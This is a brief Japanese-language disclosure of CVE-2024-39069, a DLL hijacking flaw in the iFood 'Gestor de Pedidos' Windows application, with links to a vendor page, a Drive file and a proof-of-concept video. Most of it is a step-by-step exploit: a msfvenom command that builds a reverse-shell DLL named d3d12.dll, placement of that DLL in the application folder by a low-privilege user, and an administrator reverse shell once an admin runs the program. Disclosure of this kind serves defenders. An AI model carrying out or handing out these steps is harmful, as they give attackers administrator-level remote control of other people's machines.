
CVE-2024-39069
攻撃者は、アプリケーションが正当な「d3d12.dll」よりも先に検索されるディレクトリに、悪意のある「d3d12.dll」というDLLを配置します。アプリケーションが起動されると、正当なDLLではなく悪意のあるDLLが読み込まれ、攻撃者はアプリケーションのコンテキストで任意のコードを実行できるようになります。
ベンダーホームページ: https://gestordepedidos.ifood.com.br/
Google ドライブ: https://drive.google.com/file/d/1p5SavlbLAE2o59l8jj4j-FkE_Ne_0Y-P/view?usp=sharing
POC動画: https://youtu.be/oMIobV2M0T8
Kali Linux上でmsfvenomを使用して悪意のあるDLLファイルを作成する
msfvenom -p windows/x64/shell_revese_tcp LHOST=<IP> LPORT=<PORT> -f dll -o d3d12.dll
作成した「d3d12.dll」をKaliからWindowsホストへ、低レベルのユーザーアクセス権で転送する
作成した「d3d12.dll」ファイルを「C:\Gestor de Peddios\d3d12.dll」へ、低レベルのユーザーアクセス権で移動する
管理者がアプリケーションを実行すると、管理者としてリバースシェルを取得できる